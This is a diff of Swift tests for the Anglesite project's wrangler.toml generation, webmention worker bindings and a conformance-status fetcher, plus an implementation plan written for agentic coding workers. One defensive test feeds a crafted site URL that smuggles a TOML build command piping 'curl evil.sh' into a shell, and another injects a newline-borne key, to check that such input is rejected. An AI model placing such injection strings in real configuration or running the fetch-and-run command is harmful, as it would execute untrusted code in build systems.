+            siteID: "site-1", siteDirectory: siteDirectory, siteName: "my-site",
+            workers: [webmention], acknowledgesPaidPlan: false)
+
+        guard case .webmentionPaidPlanConfirmationNeeded = result else {
+            Issue.record("expected .webmentionPaidPlanConfirmationNeeded, got \(result)")
+            return
+        }
+        let config = try String(contentsOf: siteDirectory.appendingPathComponent(".site-config"), encoding: .utf8)
+        #expect(SiteConfigFile.value(forKey: "WEBMENTION_RECEIVE_ENABLED", in: config) == "false")
+    }
+
     private func temporaryDirectory() throws -> URL {
         let url = FileManager.default.temporaryDirectory
             .appendingPathComponent("SocialWorkerProvisionCommandTests-\(UUID().uuidString)", isDirectory: true)

--- a/Tests/AnglesiteCoreTests/WorkerActivationTests.swift
+++ b/Tests/AnglesiteCoreTests/WorkerActivationTests.swift
@@ -158,4 +158,20 @@ struct WorkerActivationTests {
         let warning = WorkerActivation.missingDescriptorWarning(unresolvedIDs: ["webmention", "indieauth"])
         #expect(warning?.contains("indieauth, webmention") == true)
     }
+
+    @Test("conformanceAdvisory reports blocked packages for an active phase-gated worker")
+    func advisoryReportsBlockedPackages() {
+        let status = try! WorkersConformanceReader.parse("""
+        { "packages": { "@dwk/webmention": { "standard": "Webmention", "suites": {}, "integration": { "status": "pending" } } } }
+        """.data(using: .utf8)!)
+        let advisory = WorkerActivation.conformanceAdvisory(activeIDs: ["webmention"], conformance: status)
+        #expect(advisory != nil)
+        #expect(advisory!.contains("@dwk/webmention"))
+    }
+
+    @Test("conformanceAdvisory is nil when nothing phase-gated is active")
+    func advisoryNilWithoutRelevantWorkers() {
+        let status = WorkersConformanceStatus(packages: [:])
+        #expect(WorkerActivation.conformanceAdvisory(activeIDs: ["solid-pod"], conformance: status) == nil)
+    }
 }

--- a/Tests/AnglesiteCoreTests/WorkerCompositionTests.swift
+++ b/Tests/AnglesiteCoreTests/WorkerCompositionTests.swift
@@ -247,6 +247,31 @@ struct WorkerCompositionTests {
         #expect(!toml.contains("SITE_URL"))
     }
 
+    @Test("a siteURL containing a double quote is rejected, not interpolated raw into TOML")
+    func rejectsSiteURLWithEmbeddedQuote() throws {
+        let malicious = "https://example.com\"\n[build]\ncommand = \"curl evil.sh | sh"
+        let toml = try WorkerComposition.generateWranglerToml(
+            siteName: "my-site", workers: [webmentionWorker], siteURL: malicious)
+        #expect(!toml.contains("SITE_URL"))
+        #expect(!toml.contains("[build]"))
+        #expect(!toml.contains("curl evil.sh"))
+    }
+
+    @Test("a siteURL containing a backslash is rejected")
+    func rejectsSiteURLWithBackslash() throws {
+        let toml = try WorkerComposition.generateWranglerToml(
+            siteName: "my-site", workers: [webmentionWorker], siteURL: #"https://example.com\injected"#)
+        #expect(!toml.contains("SITE_URL"))
+    }
+
+    @Test("a siteURL containing a control character (newline) is rejected")
+    func rejectsSiteURLWithControlCharacter() throws {
+        let toml = try WorkerComposition.generateWranglerToml(
+            siteName: "my-site", workers: [webmentionWorker], siteURL: "https://example.com\nEVIL = true")
+        #expect(!toml.contains("SITE_URL"))
+        #expect(!toml.contains("EVIL"))
+    }
+
     @Test("ProvisionedResources.queueName round-trips through JSONEncoder/JSONDecoder")
     func provisionedResourcesQueueNameCodable() throws {
         let resources = WorkerComposition.ProvisionedResources(queueName: "my-site-webmention")

--- a/Tests/AnglesiteCoreTests/WorkerCompositionTests.swift
+++ b/Tests/AnglesiteCoreTests/WorkerCompositionTests.swift
@@ -10,12 +10,12 @@ private func worker(_ id: String, d1: Bool, kv: Bool, r2: Bool) -> WorkerDescrip
     )
 }
 
-private let webmentionWorker = worker("webmention", d1: true, kv: true, r2: false)
+private let genericD1KVWorker = worker("generic-d1kv-fixture", d1: true, kv: true, r2: false)
 private let indieauthWorker = worker("indieauth", d1: true, kv: true, r2: false)
 private let micropubWorker = worker("micropub", d1: true, kv: true, r2: true)
 private let websubWorker = worker("websub", d1: true, kv: true, r2: false)
-private let v2Workers = [webmentionWorker, indieauthWorker]
-private let v3Workers = [webmentionWorker, indieauthWorker, micropubWorker, websubWorker]
+private let v2Workers = [genericD1KVWorker, indieauthWorker]
+private let v3Workers = [genericD1KVWorker, indieauthWorker, micropubWorker, websubWorker]
 
 @Suite("WorkerComposition")
 struct WorkerCompositionTests {
@@ -35,7 +35,7 @@ struct WorkerCompositionTests {
     func withSocialFeatures() throws {
         let toml = try WorkerComposition.generateWranglerToml(
             siteName: "my-site",
-            workers: [webmentionWorker, indieauthWorker]
+            workers: [genericD1KVWorker, indieauthWorker]
         )
         #expect(toml.contains("name = \"my-site\""))
         #expect(toml.contains("[assets]"))
@@ -149,7 +149,7 @@ struct WorkerCompositionTests {
     @Test("run_worker_first is omitted entirely when there are no active dynamic routes")
     func omitsRunWorkerFirstWithoutClaims() throws {
         let toml = try WorkerComposition.generateWranglerToml(
-            siteName: "my-site", workers: [webmentionWorker, indieauthWorker])
+            siteName: "my-site", workers: [genericD1KVWorker, indieauthWorker])
         #expect(!toml.contains("run_worker_first"))
         #expect(toml.contains("binding = \"ASSETS\""))
     }

--- a/Tests/AnglesiteCoreTests/WorkerCompositionTests.swift
+++ b/Tests/AnglesiteCoreTests/WorkerCompositionTests.swift
@@ -16,6 +16,7 @@ private let micropubWorker = worker("micropub", d1: true, kv: true, r2: true)
 private let websubWorker = worker("websub", d1: true, kv: true, r2: false)
 private let v2Workers = [genericD1KVWorker, indieauthWorker]
 private let v3Workers = [genericD1KVWorker, indieauthWorker, micropubWorker, websubWorker]
+private let webmentionWorker = worker(WorkerComposition.webmentionWorkerID, d1: false, kv: false, r2: false)
 
 @Suite("WorkerComposition")
 struct WorkerCompositionTests {
@@ -186,6 +187,23 @@ struct WorkerCompositionTests {
             try WorkerComposition.generateWranglerToml(
                 siteName: "my-site", workers: [indieauthWorker], routeClaims: [headOnly])
         }
+    }
+
+    @Test("webmention receive adds a WEBMENTION_INBOX D1 binding on the shared database")
+    func webmentionAddsInboxBinding() throws {
+        let toml = try WorkerComposition.generateWranglerToml(
+            siteName: "my-site",
+            workers: [webmentionWorker],
+            resources: .init(d1DatabaseID: "d1-id")
+        )
+        #expect(toml.contains("binding = \"WEBMENTION_INBOX\""))
+        #expect(toml.contains("database_id = \"d1-id\""))
+    }
+
+    @Test("no webmention worker means no WEBMENTION_INBOX binding")
+    func noWebmentionOmitsInboxBinding() throws {
+        let toml = try WorkerComposition.generateWranglerToml(siteName: "my-site", workers: [indieauthWorker])
+        #expect(!toml.contains("WEBMENTION_INBOX"))
     }
 
     @Test("ProvisionedResources round-trips through JSONEncoder/JSONDecoder")

--- a/Tests/AnglesiteCoreTests/WorkerCompositionTests.swift
+++ b/Tests/AnglesiteCoreTests/WorkerCompositionTests.swift
@@ -225,6 +225,28 @@ struct WorkerCompositionTests {
         #expect(toml.contains("queue = \"my-site-webmention\""))
     }
 
+    @Test("webmention receive with a known site URL emits a SITE_URL var")
+    func webmentionEmitsSiteURL() throws {
+        let toml = try WorkerComposition.generateWranglerToml(
+            siteName: "my-site", workers: [webmentionWorker], siteURL: "https://my-site.example")
+        #expect(toml.contains("[vars]"))
+        #expect(toml.contains("SITE_URL = \"https://my-site.example\""))
+    }
+
+    @Test("webmention receive with no known site URL omits the vars block")
+    func webmentionOmitsSiteURLWhenUnknown() throws {
+        let toml = try WorkerComposition.generateWranglerToml(siteName: "my-site", workers: [webmentionWorker])
+        #expect(!toml.contains("[vars]"))
+        #expect(!toml.contains("SITE_URL"))
+    }
+
+    @Test("siteURL is ignored when webmention receive isn't active")
+    func siteURLIgnoredWithoutWebmention() throws {
+        let toml = try WorkerComposition.generateWranglerToml(
+            siteName: "my-site", workers: [indieauthWorker], siteURL: "https://my-site.example")
+        #expect(!toml.contains("SITE_URL"))
+    }
+
     @Test("ProvisionedResources.queueName round-trips through JSONEncoder/JSONDecoder")
     func provisionedResourcesQueueNameCodable() throws {
         let resources = WorkerComposition.ProvisionedResources(queueName: "my-site-webmention")

--- a/Tests/AnglesiteCoreTests/WorkerCompositionTests.swift
+++ b/Tests/AnglesiteCoreTests/WorkerCompositionTests.swift
@@ -206,6 +206,33 @@ struct WorkerCompositionTests {
         #expect(!toml.contains("WEBMENTION_INBOX"))
     }
 
+    @Test("webmention receive adds queue producer/consumer blocks")
+    func webmentionAddsQueueBlocks() throws {
+        let toml = try WorkerComposition.generateWranglerToml(
+            siteName: "my-site",
+            workers: [webmentionWorker],
+            resources: .init(queueName: "my-site-webmention")
+        )
+        #expect(toml.contains("[[queues.producers]]"))
+        #expect(toml.contains("[[queues.consumers]]"))
+        #expect(toml.contains("queue = \"my-site-webmention\""))
+        #expect(toml.contains("binding = \"WEBMENTION_QUEUE\""))
+    }
+
+    @Test("webmention queue name defaults to a deterministic placeholder before provisioning")
+    func webmentionQueueDefaultsUnprovisioned() throws {
+        let toml = try WorkerComposition.generateWranglerToml(siteName: "my-site", workers: [webmentionWorker])
+        #expect(toml.contains("queue = \"my-site-webmention\""))
+    }
+
+    @Test("ProvisionedResources.queueName round-trips through JSONEncoder/JSONDecoder")
+    func provisionedResourcesQueueNameCodable() throws {
+        let resources = WorkerComposition.ProvisionedResources(queueName: "my-site-webmention")
+        let data = try JSONEncoder().encode(resources)
+        let decoded = try JSONDecoder().decode(WorkerComposition.ProvisionedResources.self, from: data)
+        #expect(decoded == resources)
+    }
+
     @Test("ProvisionedResources round-trips through JSONEncoder/JSONDecoder")
     func provisionedResourcesCodable() throws {
         let resources = WorkerComposition.ProvisionedResources(

--- a/Tests/AnglesiteCoreTests/WorkersConformanceFetcherTests.swift
+++ b/Tests/AnglesiteCoreTests/WorkersConformanceFetcherTests.swift
@@ -1,0 +1,180 @@
+import Testing
+import Foundation
+@testable import AnglesiteCore
+
+/// Stub `URLProtocol` returning a canned status/body for every request, so
+/// `WorkersConformanceFetcher` can be exercised without a real network call — mirrors
+/// `WorkerCatalogFetcherTests`' `WorkerCatalogStubURLProtocol`.
+private final class WorkersConformanceStubURLProtocol: URLProtocol, @unchecked Sendable {
+    nonisolated(unsafe) static var statusCode = 200
+    nonisolated(unsafe) static var body = ""
+    nonisolated(unsafe) static var shouldFailToLoad = false
+
+    override class func canInit(with request: URLRequest) -> Bool { true }
+    override class func canonicalRequest(for request: URLRequest) -> URLRequest { request }
+
+    override func startLoading() {
+        if Self.shouldFailToLoad {
+            client?.urlProtocol(self, didFailWithError: URLError(.notConnectedToInternet))
+            return
+        }
+        let response = HTTPURLResponse(
+            url: request.url!,
+            statusCode: Self.statusCode,
+            httpVersion: "HTTP/1.1",
+            headerFields: nil
+        )!
+        client?.urlProtocol(self, didReceive: response, cacheStoragePolicy: .notAllowed)
+        client?.urlProtocol(self, didLoad: Data(Self.body.utf8))
+        client?.urlProtocolDidFinishLoading(self)
+    }
+
+    override func stopLoading() {}
+
+    static func makeSession() -> URLSession {
+        let config = URLSessionConfiguration.ephemeral
+        config.protocolClasses = [WorkersConformanceStubURLProtocol.self]
+        return URLSession(configuration: config)
+    }
+}
+
+// .serialized: tests share WorkersConformanceStubURLProtocol's mutable static status/body/
+// failure flag, which would race under Swift Testing's default parallel execution.
+@Suite(.serialized) struct WorkersConformanceFetcherTests {
+    private let sampleJSON = """
+    {
+      "packages": {
+        "@dwk/webmention": {
+          "standard": "Webmention",
+          "suites": { "webmention.rocks/receiver": { "status": "pending" } },
+          "integration": { "status": "passing" }
+        }
+      }
+    }
+    """
+
+    private func tempCacheURL() -> URL {
+        URL(fileURLWithPath: NSTemporaryDirectory(), isDirectory: true)
+            .appendingPathComponent("worker-conformance-\(UUID().uuidString)", isDirectory: true)
+            .appendingPathComponent("worker-conformance-cache.json")
+    }
+
+    @Test("fetches, parses, and writes the cache file on success")
+    func fetchesAndCachesOnSuccess() async throws {
+        WorkersConformanceStubURLProtocol.shouldFailToLoad = false
+        WorkersConformanceStubURLProtocol.statusCode = 200
+        WorkersConformanceStubURLProtocol.body = sampleJSON
+        let cacheURL = tempCacheURL()
+        defer { try? FileManager.default.removeItem(at: cacheURL.deletingLastPathComponent()) }
+
+        let fetcher = WorkersConformanceFetcher(
+            statusURL: URL(string: "https://example.invalid/status.json")!,
+            cacheURL: cacheURL,
+            session: WorkersConformanceStubURLProtocol.makeSession()
+        )
+
+        let status = await fetcher.status()
+        #expect(status.packages["@dwk/webmention"]?.integrationStatus == "passing")
+        #expect(FileManager.default.fileExists(atPath: cacheURL.path))
+    }
+
+    @Test("falls back to the cached status when the fetch fails")
+    func fallsBackToCacheOnFetchFailure() async throws {
+        let cacheURL = tempCacheURL()
+        defer { try? FileManager.default.removeItem(at: cacheURL.deletingLastPathComponent()) }
+        try FileManager.default.createDirectory(
+            at: cacheURL.deletingLastPathComponent(), withIntermediateDirectories: true)
+        try Data(sampleJSON.utf8).write(to: cacheURL)
+
+        WorkersConformanceStubURLProtocol.shouldFailToLoad = true
+        let fetcher = WorkersConformanceFetcher(
+            statusURL: URL(string: "https://example.invalid/status.json")!,
+            cacheURL: cacheURL,
+            session: WorkersConformanceStubURLProtocol.makeSession()
+        )
+
+        let status = await fetcher.status()
+        #expect(status.packages["@dwk/webmention"]?.integrationStatus == "passing")
+    }
+
+    @Test("falls back to an empty status on total failure (no network, no cache)")
+    func fallsBackToEmpty() async throws {
+        WorkersConformanceStubURLProtocol.shouldFailToLoad = true
+        let cacheURL = tempCacheURL()
+        defer { try? FileManager.default.removeItem(at: cacheURL.deletingLastPathComponent()) }
+
+        let fetcher = WorkersConformanceFetcher(
+            statusURL: URL(string: "https://example.invalid/status.json")!,
+            cacheURL: cacheURL,
+            session: WorkersConformanceStubURLProtocol.makeSession()
+        )
+        let status = await fetcher.status()
+        #expect(status.packages.isEmpty)
+    }
+
+    @Test("returns an empty status on a non-2xx response with no cache")
+    func returnsEmptyOnBadStatusWithNoCache() async {
+        WorkersConformanceStubURLProtocol.shouldFailToLoad = false
+        WorkersConformanceStubURLProtocol.statusCode = 404
+        WorkersConformanceStubURLProtocol.body = "not found"
+        let cacheURL = tempCacheURL()
+        defer { try? FileManager.default.removeItem(at: cacheURL.deletingLastPathComponent()) }
+
+        let fetcher = WorkersConformanceFetcher(
+            statusURL: URL(string: "https://example.invalid/status.json")!,
+            cacheURL: cacheURL,
+            session: WorkersConformanceStubURLProtocol.makeSession()
+        )
+
+        let status = await fetcher.status()
+        #expect(status.packages.isEmpty)
+    }
+
+    @Test("falls back to the cached status when the response is 200 but the body is malformed JSON")
+    func fallsBackToCacheOnMalformedJSONBody() async throws {
+        let cacheURL = tempCacheURL()
+        defer { try? FileManager.default.removeItem(at: cacheURL.deletingLastPathComponent()) }
+        try FileManager.default.createDirectory(
+            at: cacheURL.deletingLastPathComponent(), withIntermediateDirectories: true)
+        try Data(sampleJSON.utf8).write(to: cacheURL)
+
+        WorkersConformanceStubURLProtocol.shouldFailToLoad = false
+        WorkersConformanceStubURLProtocol.statusCode = 200
+        WorkersConformanceStubURLProtocol.body = "{ not valid json"
+        let fetcher = WorkersConformanceFetcher(
+            statusURL: URL(string: "https://example.invalid/status.json")!,
+            cacheURL: cacheURL,
+            session: WorkersConformanceStubURLProtocol.makeSession()
+        )
+
+        let status = await fetcher.status()
+        #expect(status.packages["@dwk/webmention"]?.integrationStatus == "passing")
+    }
+
+    @Test("returns an empty status when the cache file on disk is corrupted and the fetch also fails")
+    func returnsEmptyWhenCacheIsCorruptedAndFetchFails() async throws {
+        let cacheURL = tempCacheURL()
+        defer { try? FileManager.default.removeItem(at: cacheURL.deletingLastPathComponent()) }
+        try FileManager.default.createDirectory(
+            at: cacheURL.deletingLastPathComponent(), withIntermediateDirectories: true)
+        try Data("{ not valid json".utf8).write(to: cacheURL)
+
+        WorkersConformanceStubURLProtocol.shouldFailToLoad = true
+        let fetcher = WorkersConformanceFetcher(
+            statusURL: URL(string: "https://example.invalid/status.json")!,
+            cacheURL: cacheURL,
+            session: WorkersConformanceStubURLProtocol.makeSession()
+        )
+
+        let status = await fetcher.status()
+        #expect(status.packages.isEmpty)
+    }
+
+    @Test("productionStatusURL points at the published davidwkeith/workers conformance status")
+    func productionStatusURLIsThePublishedManifest() {
+        #expect(
+            WorkersConformanceFetcher.productionStatusURL
+                == URL(string: "https://raw.githubusercontent.com/davidwkeith/workers/main/conformance/status.json")!
+        )
+    }
+}

--- a/docs/superpowers/plans/2026-07-21-issue-359-webmention-receive-rest.md
+++ b/docs/superpowers/plans/2026-07-21-issue-359-webmention-receive-rest.md
@@ -1,0 +1,1431 @@
+# Webmention Receive (#359) — Provisioning, Discovery, Conformance Implementation Plan
+
+> **For agentic workers:** REQUIRED SUB-SKILL: Use superpowers:subagent-driven-development (recommended) or superpowers:executing-plans to implement this plan task-by-task. Steps use checkbox (`- [ ]`) syntax for tracking.
+
+**Goal:** Finish the Swift/template side of #359 (Webmention receive) that PR #887 deliberately deferred: Cloudflare Queue + D1-inbox-binding + `SITE_URL` provisioning (with an explicit paid-plan opt-in), a provisioning-gated `<link rel="webmention">` discovery tag, and an advisory (non-blocking) surface for `WorkersConformanceStatus.gateStatus(.v3)`.
+
+**Architecture:** `@dwk/webmention`'s receiver is already composed into `worker/worker.ts` (PR #887) behind three optional bindings — `WEBMENTION_QUEUE`, `WEBMENTION_INBOX` (D1), `SITE_URL`. This plan makes `WorkerComposition.generateWranglerToml` emit those three bindings (special-cased on the catalog id `"webmention"`, exactly mirroring how `indieauthWorkerID`/`AUTH_DB` is special-cased today — *not* a new generic `WorkerDescriptor.Resources` flag, since that would require a paired schema change in the external `davidwkeith/workers` catalog repo per `CONTRIBUTING.md`'s catalog-coordination rule), makes `SocialWorkerProvisionCommand` create the Cloudflare Queue (gated on an explicit per-site opt-in acknowledgment, since Queues require the Workers **Paid** plan), and wires that opt-in into `DeployModel`'s existing park-and-retry sheet pattern (the same mechanism `workerNameConflict` already uses — no new UI infrastructure invented). Discovery reuses the already-established `.site-config` + `readConfig()` gating mechanism (`SiteConfigFile.upsert`/`WebsiteAnalyticsAsset`). Conformance wiring is a new `WorkersConformanceFetcher` (mirrors `WorkerCatalogFetcher` exactly) plus an advisory debug-pane log line — **not** a hard activation gate, because the real `conformance/status.json` (verified live against `davidwkeith/workers` during planning) currently reports `@dwk/webmention`/`@dwk/micropub`/`@dwk/websub` all `"pending"`, so a hard gate would immediately break the receiver PR #887 already shipped.
+
+**Tech Stack:** Swift 6.4 (SwiftPM `AnglesiteCore`/`AnglesiteApp` targets, Swift Testing), Astro/TypeScript template (`Resources/Template/`), Cloudflare `wrangler.toml`.
+
+## Global Constraints
+
+- Swift package tests: `swift test --package-path .` from the repo root. Fresh worktree: run `xcodegen generate` before any `xcodebuild` (not needed for `swift test`).
+- Follow `CONTRIBUTING.md`: conventional commits, subject ≤72 chars, PR body uses `.github/PULL_REQUEST_TEMPLATE.md`'s exact headings (Summary / Paired PR check / Test plan).
+- **Do not** add a new field to `WorkerDescriptor.Resources` (`needsD1`/`needsKV`/`needsR2`) — that schema is owned by the external `davidwkeith/workers` catalog repo. Special-case on `WorkerComposition.webmentionWorkerID` instead, exactly like `indieauthWorkerID`/`AUTH_DB`.
+- **Do not** gate worker activation/deploy on `WorkersConformanceStatus.gateStatus(.v3)`. It's advisory only (see Task 11) — the real status.json shows V-3 packages `"pending"` today, and #887's receiver is meant to be usable now.
+- Area 2 (D1→git canonicality snapshot, `ReceivedInteraction`) is explicitly **out of scope** for this plan — deferred to #362 (see Task 12, which only leaves a documentation trail).
+- The webmention.rocks *receiver*-side conformance suite cannot be automated in this repo (it requires an interactive session-token flow against a publicly deployed receiver, exactly like the existing sender-side `WebmentionRocksLiveTests.swift` already documents for POST-acceptance) — do not attempt to write a live receiver test. Task 11 documents this instead.
+
+---
+
+## File Structure
+
+| File | Responsibility |
+|---|---|
+| `Sources/AnglesiteCore/WorkerComposition.swift` | Emit `WEBMENTION_INBOX` D1 binding, `[[queues.*]]` blocks, `SITE_URL` var, `webmentionWorkerID` constant, `queueName` provisioned-resource field |
+| `Tests/AnglesiteCoreTests/WorkerCompositionTests.swift` | Fixture rename (id collision fix) + new TOML-emission tests |
+| `Sources/AnglesiteCore/SocialWorkerProvisionCommand.swift` | Create the Cloudflare Queue; new `.webmentionPaidPlanConfirmationNeeded` result case; thread `siteURL`/`acknowledgesPaidPlan` through `provision`/`persistConfig` |
+| `Tests/AnglesiteCoreTests/SocialWorkerProvisionCommandTests.swift` | Queue-creation + paid-plan-gate tests |
+| `Sources/AnglesiteCore/SiteConfigStore.swift` | New `SiteSettings.webmentionReceivePaidPlanAcknowledged` field |
+| `Sources/AnglesiteCore/DeployCoordinator.swift` | New `resolveSiteURL(siteDirectory:)` helper (mirrors `resolveWorkerSiteName`) |
+| `Tests/AnglesiteCoreTests/DeployCoordinatorTests.swift` | Tests for `resolveSiteURL` |
+| `Sources/AnglesiteApp/DeployModel.swift` | New `Phase.webmentionPaidPlanConfirmationNeeded`, `webmentionPaidPlanConfirmationPresented`, `acknowledgeWebmentionPaidPlanAndRetry()`, `cancelWebmentionPaidPlanConfirmation()`; wire `siteURL`/`acknowledgesPaidPlan` into the `provision` call |
+| `Sources/AnglesiteApp/WebmentionPaidPlanConfirmationSheetView.swift` | New sheet view (mirrors `WorkerNameConflictSheetView`) |
+| `Sources/AnglesiteApp/SiteWindow.swift` | Wire the new sheet |
+| `Resources/Template/src/layouts/BaseLayout.astro` | Gated `<link rel="webmention" href="/webmention">` |
+| `Resources/Template/src/layouts/BaseLayout.test.ts` (or nearest existing layout test) | Test the gated link — see Task 9 for exact existing test file to extend |
+| `Sources/AnglesiteCore/WorkersConformanceFetcher.swift` | New — mirrors `WorkerCatalogFetcher`, fetches/caches `conformance/status.json` |
+| `Tests/AnglesiteCoreTests/WorkersConformanceFetcherTests.swift` | New fetcher tests |
+| `Sources/AnglesiteCore/WorkerActivation.swift` | New `conformanceAdvisory(...)` pure helper |
+| `Tests/AnglesiteCoreTests/WorkerActivationTests.swift` | Advisory tests |
+
+---
+
+### Task 1: Fix the `"webmention"` id collision in `WorkerCompositionTests` fixtures
+
+The existing test suite uses a fixture literally named `worker("webmention", d1: true, kv: true, r2: false)` purely to exercise the *generic* `needsD1`/`needsKV` composition path (see `Tests/AnglesiteCoreTests/WorkerCompositionTests.swift:13-18`). Task 2 special-cases the real catalog id `"webmention"` the same way `indieauthWorkerID` is special-cased — so before adding that logic, rename this fixture so the two concerns don't collide and silently change already-passing tests' expected output.
+
+**Files:**
+- Modify: `Tests/AnglesiteCoreTests/WorkerCompositionTests.swift:1-18`
+
+**Interfaces:**
+- Produces: `genericD1KVWorker` (renamed from `webmentionWorker`), `v2Workers`/`v3Workers` now reference it.
+
+- [ ] **Step 1: Rename the fixture and its id**
+
+Edit the top of `Tests/AnglesiteCoreTests/WorkerCompositionTests.swift`:
+
+```swift
+private let genericD1KVWorker = worker("generic-d1kv-fixture", d1: true, kv: true, r2: false)
+private let indieauthWorker = worker("indieauth", d1: true, kv: true, r2: false)
+private let micropubWorker = worker("micropub", d1: true, kv: true, r2: true)
+private let websubWorker = worker("websub", d1: true, kv: true, r2: false)
+private let v2Workers = [genericD1KVWorker, indieauthWorker]
+private let v3Workers = [genericD1KVWorker, indieauthWorker, micropubWorker, websubWorker]
+```
+
+Then replace every remaining use of `webmentionWorker` in the file (in `withSocialFeatures()` and `omitsRunWorkerFirstWithoutClaims()`) with `genericD1KVWorker`.
+
+- [ ] **Step 2: Run the suite to confirm nothing broke**
+
+Run: `swift test --package-path . --filter WorkerCompositionTests`
+Expected: PASS (all existing assertions still hold — this step only renames an identifier, it changes no behavior).
+
+- [ ] **Step 3: Commit**
+
+```bash
+git add Tests/AnglesiteCoreTests/WorkerCompositionTests.swift
+git commit -m "test(worker-composition): decouple generic D1/KV fixture from the real webmention id"
+```
+
+---
+
+### Task 2: Emit the `WEBMENTION_INBOX` D1 binding
+
+Mirrors the existing `AUTH_DB` block exactly (`Sources/AnglesiteCore/WorkerComposition.swift:135-146`): same physical D1 database (`resources.d1DatabaseID`), a second binding name so `@dwk/webmention`'s `createD1Inbox` gets its own binding without a second database.
+
+**Files:**
+- Modify: `Sources/AnglesiteCore/WorkerComposition.swift`
+- Test: `Tests/AnglesiteCoreTests/WorkerCompositionTests.swift`
+
+**Interfaces:**
+- Produces: `WorkerComposition.webmentionWorkerID: String` (public constant, `"webmention"`)
+
+- [ ] **Step 1: Write the failing test**
+
+Add to `WorkerCompositionTests.swift`:
+
+```swift
+private let webmentionWorker = worker(WorkerComposition.webmentionWorkerID, d1: false, kv: false, r2: false)
+
+@Test("webmention receive adds a WEBMENTION_INBOX D1 binding on the shared database")
+func webmentionAddsInboxBinding() throws {
+    let toml = try WorkerComposition.generateWranglerToml(
+        siteName: "my-site",
+        workers: [webmentionWorker],
+        resources: .init(d1DatabaseID: "d1-id")
+    )
+    #expect(toml.contains("binding = \"WEBMENTION_INBOX\""))
+    #expect(toml.contains("database_id = \"d1-id\""))
+}
+
+@Test("no webmention worker means no WEBMENTION_INBOX binding")
+func noWebmentionOmitsInboxBinding() throws {
+    let toml = try WorkerComposition.generateWranglerToml(siteName: "my-site", workers: [indieauthWorker])
+    #expect(!toml.contains("WEBMENTION_INBOX"))
+}
+```
+
+- [ ] **Step 2: Run to verify it fails**
+
+Run: `swift test --package-path . --filter WorkerCompositionTests`
+Expected: FAIL — `WorkerComposition.webmentionWorkerID` doesn't exist yet, and no `WEBMENTION_INBOX` is emitted.
+
+- [ ] **Step 3: Implement**
+
+In `Sources/AnglesiteCore/WorkerComposition.swift`, add the constant next to `indieauthWorkerID` (after line 25):
+
+```swift
+    /// `@dwk/webmention`'s catalog id — like `indieauthWorkerID`, composition keys off this
+    /// directly for the receiver's three bespoke bindings (`WEBMENTION_INBOX`, the Queue,
+    /// `SITE_URL`), since those binding names are part of `@dwk/webmention`'s public composition
+    /// contract, not something a generic `resources` flag can express without a paired schema
+    /// change in the external `davidwkeith/workers` catalog repo.
+    public static let webmentionWorkerID = "webmention"
+```
+
+Compute `hasWebmentionReceive` next to `hasIndieauth` (near line 98):
+
+```swift
+        let hasIndieauth = workers.contains(where: { $0.id == indieauthWorkerID })
+        let hasWebmentionReceive = workers.contains(where: { $0.id == webmentionWorkerID })
+```
+
+Add the D1 binding block immediately after the existing `hasIndieauth` AUTH_DB block (after line 146, before the KV block):
+
+```swift
+        // Same shared per-site D1 database as DB/AUTH_DB, bound a third time under
+        // WEBMENTION_INBOX — @dwk/webmention's createD1Inbox creates its own `webmentions`
+        // table on first use, so no separate database or migration is needed here.
+        if hasWebmentionReceive {
+            lines.append("")
+            lines.append("[[d1_databases]]")
+            lines.append("binding = \"WEBMENTION_INBOX\"")
+            lines.append("database_name = \"\(siteName)-social\"")
+            if let id = resources.d1DatabaseID, !id.isEmpty {
+                lines.append("database_id = \"\(id)\"")
+            } else {
+                lines.append("database_id = \"\"  # filled by provisioning")
+            }
+        }
+```
+
+- [ ] **Step 4: Run to verify it passes**
+
+Run: `swift test --package-path . --filter WorkerCompositionTests`
+Expected: PASS
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add Sources/AnglesiteCore/WorkerComposition.swift Tests/AnglesiteCoreTests/WorkerCompositionTests.swift
+git commit -m "feat(worker-composition): emit WEBMENTION_INBOX D1 binding for #359"
+```
+
+---
+
+### Task 3: Emit the Cloudflare Queue producer/consumer blocks
+
+Adds `queueName` to `ProvisionedResources` (mirrors `r2BucketName`'s "deterministic name, not an id" shape — Cloudflare's `wrangler.toml` queue blocks reference queues by name, not id).
+
+**Files:**
+- Modify: `Sources/AnglesiteCore/WorkerComposition.swift`
+- Test: `Tests/AnglesiteCoreTests/WorkerCompositionTests.swift`
+
+**Interfaces:**
+- Consumes: `webmentionWorkerID`, `hasWebmentionReceive` (Task 2)
+- Produces: `WorkerComposition.ProvisionedResources.queueName: String?`
+
+- [ ] **Step 1: Write the failing test**
+
+```swift
+@Test("webmention receive adds queue producer/consumer blocks")
+func webmentionAddsQueueBlocks() throws {
+    let toml = try WorkerComposition.generateWranglerToml(
+        siteName: "my-site",
+        workers: [webmentionWorker],
+        resources: .init(queueName: "my-site-webmention")
+    )
+    #expect(toml.contains("[[queues.producers]]"))
+    #expect(toml.contains("[[queues.consumers]]"))
+    #expect(toml.contains("queue = \"my-site-webmention\""))
+    #expect(toml.contains("binding = \"WEBMENTION_QUEUE\""))
+}
+
+@Test("webmention queue name defaults to a deterministic placeholder before provisioning")
+func webmentionQueueDefaultsUnprovisioned() throws {
+    let toml = try WorkerComposition.generateWranglerToml(siteName: "my-site", workers: [webmentionWorker])
+    #expect(toml.contains("queue = \"my-site-webmention\""))
+}
+
+@Test("ProvisionedResources.queueName round-trips through JSONEncoder/JSONDecoder")
+func provisionedResourcesQueueNameCodable() throws {
+    let resources = WorkerComposition.ProvisionedResources(queueName: "my-site-webmention")
+    let data = try JSONEncoder().encode(resources)
+    let decoded = try JSONDecoder().decode(WorkerComposition.ProvisionedResources.self, from: data)
+    #expect(decoded == resources)
+}
+```
+
+- [ ] **Step 2: Run to verify it fails**
+
+Run: `swift test --package-path . --filter WorkerCompositionTests`
+Expected: FAIL — `ProvisionedResources` has no `queueName` member, no `[[queues.*]]` emitted.
+
+- [ ] **Step 3: Implement**
+
+Add `queueName` to `ProvisionedResources` (`Sources/AnglesiteCore/WorkerComposition.swift:41-51`):
+
+```swift
+    public struct ProvisionedResources: Sendable, Equatable, Codable {
+        public var d1DatabaseID: String?
+        public var kvNamespaceID: String?
+        public var r2BucketName: String?
+        /// The Cloudflare Queue name backing `@dwk/webmention`'s async verify step. Like
+        /// `r2BucketName`, this is a deterministic name (`\(siteName)-webmention`), not an id —
+        /// wrangler.toml's `[[queues.*]]` blocks reference queues by name.
+        public var queueName: String?
+
+        public init(
+            d1DatabaseID: String? = nil, kvNamespaceID: String? = nil, r2BucketName: String? = nil,
+            queueName: String? = nil
+        ) {
